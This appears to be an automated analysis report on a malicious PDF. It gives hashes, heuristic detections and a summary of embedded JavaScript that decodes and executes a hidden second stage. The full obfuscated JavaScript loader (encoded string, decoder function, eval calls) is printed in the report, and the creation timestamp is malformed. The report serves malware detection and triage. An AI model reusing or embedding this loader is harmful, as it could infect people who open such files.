PDF malware analysis — malicious · 2cfafdf8baafc4d0

MALICIOUS

PDF

7.2 KB Created: 2008-31-20 53:85:00 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08

MD5: 48fc8d066437bc3e51a1d28c11f32a41 SHA-1: b392cfe4c89c15c95bbbcc11d1f15ddb101724d0 SHA-256: 2cfafdf8baafc4d067d35fa8c2fc0018197c0bdb4b722796c3df06180b348351

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream itself is heavily obfuscated, with a high-confidence PDF_EVAL firing suggesting dynamic code execution. The script appears to reconstruct strings and execute them, a common technique for downloading and running second-stage malware. The authoring application 'Scribus' is unusual for malicious PDFs, but the obfuscated JavaScript is a strong indicator of malicious intent.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 4

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

Matched line in script

stream
function UClwxlP2() {var datfield = 'T3H'+'@Gpa'+'bfw0TG'+'EOZVpb7T'+'B0JUpbiGlH@hbbh'+'mOQJwwx@B'+'0xH'+'2p'+'Q0fj'+'WT'+'I0EHf45VA4'+'J@kbp'+'J1E'+'xC4n0'+'yAaamZn@JpDgMg0ammpp2H0hHDpahMpWJUHYJnREf'+'W44HMQf0J'+'j77Zn@JpDgMg0'+'pbMpWJU'+'HYJnRfm@f7mMpWJUHY'+'JnR5'+'aa'+'ppJ1ExC4n0yApb7TNhs'+'DtW'+'Dy4g'+'V2eH2XRf2G0'+'4H'+'Mba'+'sW5'+'4XDhqDdDzfG'+'HpaT'+'j'+'HJB4EV2pp'+'J1ExC4n'+'0yAZ7ma'+'pQJw'+'wx@B0'+'xH2pp0zl5'+'Cxnh'+'Ck'+'bg2HHammpQ2ZlfmDpOT3'+'0'+'zsTf7m1WfsipO@1ehsiZ7m8x4VTjm08KhTP0Eb …
endstream

Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0013_001.js`	pdf-javascript-stream	PDF /JS object 13 at offset 0x38C	5883 bytes
SHA-256: `65d6d0ba83eb7620898b99d2e6ec7ce6aa814ecbc10fbba1bf661a287c093ee9`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script function UClwxlP2() {var datfield = 'T3H'+'@Gpa'+'bfw0TG'+'EOZVpb7T'+'B0JUpbiGlH@hbbh'+'mOQJwwx@B'+'0xH'+'2p'+'Q0fj'+'WT'+'I0EHf45VA4'+'J@kbp'+'J1E'+'xC4n0'+'yAaamZn@JpDgMg0ammpp2H0hHDpahMpWJUHYJnREf'+'W44HMQf0J'+'j77Zn@JpDgMg0'+'pbMpWJU'+'HYJnRfm@f7mMpWJUHY'+'JnR5'+'aa'+'ppJ1ExC4n0yApb7TNhs'+'DtW'+'Dy4g'+'V2eH2XRf2G0'+'4H'+'Mba'+'sW5'+'4XDhqDdDzfG'+'HpaT'+'j'+'HJB4EV2pp'+'J1ExC4n'+'0yAZ7ma'+'pQJw'+'wx@B0'+'xH2pp0zl5'+'Cxnh'+'Ck'+'bg2HHammpQ2ZlfmDpOT3'+'0'+'zsTf7m1WfsipO@1ehsiZ7m8x4VTjm08KhTP0EbJ'+'0gMAu7maOb'+'22'+'4x'+'VixhVDbQmDEf'+'C'+'Au'+'OsDEfCAu'+'OsDE'+'fCAuOsD'+'Ef'+'sr'+'4q'+'iDE5sAE'+'ui'+'DEE'+'C8e'+'@'+'aDEfa1j'+'@aDEfa1OWsDEHXr'+'ROsDEHXGu'+'OsDEHXvn'+'@i'+'DEH'+'XfOWCDEEXr4ziDEE'+'X'+'rnqXD'+'Ef'+'avtuXDEfXrQWX'+'DEHXr'+'4qXD'+'EECBEqXD'+'EHXA5qXDEHarn7CDEfCG3z'+'sDEHarn'+'7C'+'DEECl4zCD'+'EHXrpO'+'sD'+'EHXr4qi'+'DEECB'+'EqXDEEihOOsD'+'EEC6WOCDEHX65@sD'+'EfsUOOsDEHXrxWsDE'+'HXr4qXD'+'EHiRnu'+'CDEE'+'ih'+'EqiDE5CU'+'WO'+'C'+'D'+'E'+'ECw5WsDEfsUE@s'+'DEHXrxuXDEHXr4qXDEHi'+'RnuCDEEihEzCDE5iRbOC'+'DEHs1EuX'+'DEfsU'+'j7'+'X'+'DEHXrp7'+'XDEHXr'+'4qXDEHiRnuCDEEih'+'E'+'zs'+'DEfs1WOCDEf'+'srlW'+'sDEfsU'+'W'+'uXDE'+'HXrRuiDEHX'+'r4qXDEHiRnu'+'CD'+'EEih'+'3qXDEE'+'sl'+'bOC'+'D'+'EfsR0'+'uCDEfsUEOCDEHX'+'rlW'+'aDEHXr4qXDEHiRnuCD'+'E'+'Hi'+'rnq'+'iDEf'+'X'+'U3u'+'X'+'DEHaRlOiDEEC85WCDEEXU5@'+'iDEHXfOuCDEHXr4'+'@XDE'+'Ei6EqX'+'D'+'EHaRnu'+'C'+'DEECBeqiDEHXvx@iDEHX'+'lb'+'WCDEE'+'CBjqCDEEX'+'Uj@iDEf'+'sUj@aDEH'+'Xrn7CD'+'EHX'+'r4qXDEfaUjqX'+'D'+'E'+'EXwu@aDEH'+'a'+'rRmsDE5CfOOCDEHXr4qXDEEC8'+'EqXDE'+'EXA5@iDEEsRn7'+'CDEEsrnOiDEEC8jqXDE5irx@iDEHs'+'1WOCDEHXr4qXDEE'+'ir'+'4qX'+'DEHiRn7CD'+'Ef'+'aw3qiDEEi8EmXD'+'EE'+'iRn7CDEfsU3z'+'CDEHX'+'rbWXDEH'+'Xr4q'+'XDEH'+'iR4ziD'+'EEsfeqX'+'DEEiAEqXDE5i6HWsDEEsfWW'+'iDEHXv'+'xqXD'+'EfaR0OCDEHXr4qXDE'+'H'+'aRx7sDEECBe'+'q'+'X'+'DEHXA5@iDEHXlbWCDEECBjqCDEEXUj@iDEHirpOCD'+'EHXr'+'4qXDE'+'fawEq'+'XDEEiUEmaD'+'EHi'+'R'+'4ziDEfXk'+'RqiDEE'+'i'+'kR7CDEHs'+'1jziDE5ir0Wi'+'DEEiklq'+'XDEH'+'iRn7CDEfaw3'+'zsDEE'+'i8E@'+'iDEEiRn7CDEfsU3'+'zCDEHXrR'+'ziDEHX'+'r4qXDEHXrb'+'WC'+'DEHaR'+'x7sDE'+'ECBeqXDEH'+'XU5@iDEHXjbWCDEECBjq'+'CDE'+'EXUj@iDEEX'+'r'+'pOCDEHXr4qXDEfawEqX'+'DEECB'+'57'+'sDE'+'EXrx@'+'iDEHXlbWCD'+'EECBjqCD'+'EEXUj@'+'iD'+'EHX'+'rpOC'+'DEHXr4qXDEHil4qXDEEijl'+'m'+'CDEfsl4ziDEfsl4ziD'+'Efsl4'+'z'+'iDEfsl4ziDEfsA'+'3O'+'iDEEiwEqi'+'DE'+'ECBjziDEfsjRWCDEEijx7aDEf'+'srx7'+'sDEECBj@i'+'DEECBOOsDE'+'HXUHusD'+'EEi'+'G37CDEEihEz'+'sDE'+'Hakn7CDEEC'+'Buzs'+'DEEX6Hu'+'iDEHXk0OC'+'DEEih5OiDEHah37CDEHX'+'kRqXDEfXkxOiDEHi8juCDEfCG5@'+'XDEEsk4ziDEfX'+'k'+'l@'+'aDE'+'HX'+'15W'+'aD'+'EEXr4WsDE'+'HsjQ'+'@CDEHXUHuiDEE'+'s6'+'jWXDEHXk4'+'q'+'sDEH'+'irx7XDEHslp7CDEHs6u'+'m'+'CDEHaRl@sDEEiwOWi'+'DEfsB37CDEEiw37C'+'DE'+'HXkR'+'qiDEfaheusDEHXA37'+'CDE'+'ECB5mCDEEXAj'+'@CDE5sG'+'Ez'+'iDEHXvn'+'7CDEHXkn7CDEEi6jWiDEE'+'sjlqsDEH'+'Xr4'+'zCD'+'EHsvpOCDE'+'H'+'s15WsDEEiR'+'x'+'7sDEHiA'+'jmXD'+'EHi15qsDEHXrx@sDE5CB37aDE5C1N7CDEE'+'s'+'rRWi'+'DEEC8juXDEECwNusDEEC'+'fNOsDE'+'ECrnOsDE'+'Esln7X'+'DEE'+'C'+'w3WCDEEsrlu'+'X'+'DE5CB37aDE'+'ECk'+'n7XDEECwjuXD'+'EE'+'CwNuCD'+'E5'+'C'+'B3WXDEEsrtOsDE5C'+'hNOsDE5CBNOsDEECj'+'nWCD'+'E'+'EsrluXD'+'E'+'ECrnOiDEECB3WsDE5C1jW'+'XD'+'E5C'+'13'+'7aDEECheuXDE5sjn7CDE5s6e7'+'CDE5s6e7'+'aDE5C'+'A'+'juCDEECkt7sD'+'E5sBe7XXHpaT3H@Gpbyr0mb0x0sxlJ0Tf7m1WfC'+'1O7s1OOa'+'T3H@GpaHB70i'+'AEFmaOQiHn'+'u'+'0Ow@bFD0'+'DdR7'+'C270J2th2HpQhTjO'+'aT3H@Gpb@r'+'4'+'0'+'TYRYZTf7m'+'n'+'n@'+'Zf00@6HqM0pbfTWaHB70'+'iAEgh1W5sfH'+'paT3H@Gp'+'pJ1ExC4'+'n'+'0y'+'Apb7TEEHDR5@ZpHJHjbFw'+'07sh'+'OWFw0'+'7shO'+'um0T7'+'mMpWJUHYJnRfmaOQ0fjWTI0EHf45VA4J@kbpJ1E'+'xC4'+'n0yAa'+'amZn@JpDgMg0p'+'aT'+'3H@Gpa2Ihh'+'DB04J40mmaOahDpOT30'+'zsT'+'fam1WfC'+'1O7'+'s1O'+'WhV'+'EYXxbH'+'0Zx'+'WZ_0xaT3xHG'+'pah8x4VTWq2h30@'+'k'+'RHaaOOa'+'5'+'nHayx'+'xiA'+'077Bt'+'JHEQ'+'H'+'0y0JZmW'+'q2h30@kRHa@TbhTTfmfbEHplWCz6xD5nHayxxiA0WKTf7mMp'+'W'+'JUHY'+'JnR'+'fm@OQ'+'iHnu0Ow@'+'bF'+'D0D'+'dR7CmObWTffmy4EHiQH0VwhmhxYsFt4ZfpJ'+'2HHam'+'mpQ'+'2Zlfm'+'BhqJ'+'UHY0G0hH'+'OlgXTf7mZpfV23H0Dt'+'HJGnJJ'+'G'+'RH'+'0Vw4fB6xMBlH'+'02thh0T7mBhqJUHY'+'0G0hHOl'+'gXTf7mBh'+'qJU'+'HY0'+'G'+'0hHOlgX'+'2jHJ1a0@i4hhV7FX'+'VNhfXj'+'bhmOQ2Zlfmd6'+'x08QY'+'Zlpb7TB0JU'+'pbi'+'Gl'+'H@hba2pnxC4D4V0ahT'+'_tqfib0@'+'Gxm2H'+'OWhWuHT'+'y'+'tWDJlH'+'0WaqMcwp'+'@Hx4VRQf'+'h'+'6H'+'afBhqJ'+'UHY0G0hHOlgX2eh0Z'+'l'+'Hi'+'BbQs0HpaTH4JTWah'+'d6x08QYZl'+'ZF'+'sQpb7aOaaT3Q'+'FTW'+'ahd6x08QYZlZJsQpb7aOb'+'sT3QFTegH@nfyg4zDGfFm7OQs'+'0O'+'aW7ppMVZ423D'+'@XqxWKT77m6H'+'b'+'hT7fW'+'TWpMVZ423D'+'@X'+'qp'+'WKTfW'+'7TN7my3amd6x08QYZlZJsQpa7T5WhT7fWTWpMVZ423D@Xqp'+'WKT77'+'mUHbhTTfm'+'@ZqVUHqJBemDU'+'bbhmOQ'+'2Zlfmd'+'n4T@hm0H'+'ax@yQYbTf'+'7mww0JAR0@14hh'+'XEb21'+'ehsi4b21'+'ehsilbhmOp2H0'+'hHD'+'bpMywz0pbh0WR4J3DEfW'+'44HMQf0T7'+'7mBuWawjWhTe'+'YJPZ0THbhH'+'inhyF'+'pphaOpMywz0pbh0WR4'+'J3D'+'5aTu'+'f0'+'0REfi6hHWx4@dQ5HG4hm'+'aOp'+'iVahHZl'+'4fi6hH'+'W4'+'x'+'@'+'B4@HZ'+'0hHxw4JVb'+'pbA4E'+'@JD7mX'+'jafb'+'R'+'5JFOpM'+'ywz0pbh0W'+'R4J3DHW0T7mapbW'+'THHMGK'+'5JgbfMwbbh'+'m3'; function w5RFqmg8eu(KqPi5lTk9){ var tp = '63@38@56@2@15@30@39@42@32@0@0@0@0@0@0@0@61@37@34@40@51@14@44@36@62@1@60@50@9@49@6@26@24@11@23@25@54@33@57@58@52@12@55@0@0@0@0@4@0@43@59@17@5@22@46@28@47@53@18@21@19@45@3@8@27@13@16@41@7@10@20@35@31@48@29'; var hktOi2=0, SqusSa=KqPi5lTk9.length, wwvz1NEr0=1024, fopuDgJwk5PVDc, rXTW9, Q5lx59CvI9u7xo='', s8GOCguQJWT=hktOi2, y1ypz3aw8j042H=hktOi2, lFmRtu=hktOi2, A8OCXhi=Array(); A8OCXhi = tp.split('@'); for(eval('rXTW9=Ma'+'th.'+'ce'+'il(SqusSa'+'/wwvz1NEr0)');rXTW9>hktOi2;rXTW9--){ for(eval('fopuDgJwk5PVDc=M'+'ath'+'.m'+'in(SqusSa,'+'wwvz1NEr0)');fopuDgJwk5PVDc>hktOi2;fopuDgJwk5PVDc--,SqusSa--){ eval('lFmRtu\|'+'=(A8OCXhi['+'KqPi5lTk9.'+'cha'+'rCo'+'de'+'At(s8GOCguQJWT+'+'+)-48])<'+'<y1ypz3aw8j042H'); if(y1ypz3aw8j042H){ eval('Q5lx59CvI9u7xo+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](150^'+'lFmRtu&'+'25'+'5)'); lFmRtu>>=8; y1ypz3aw8j042H-=2; } else { y1ypz3aw8j042H=6; } } } eval(Q5lx59CvI9u7xo); } w5RFqmg8eu(datfield);}

Open this report in the interactive analyzer, or submit your own file for analysis.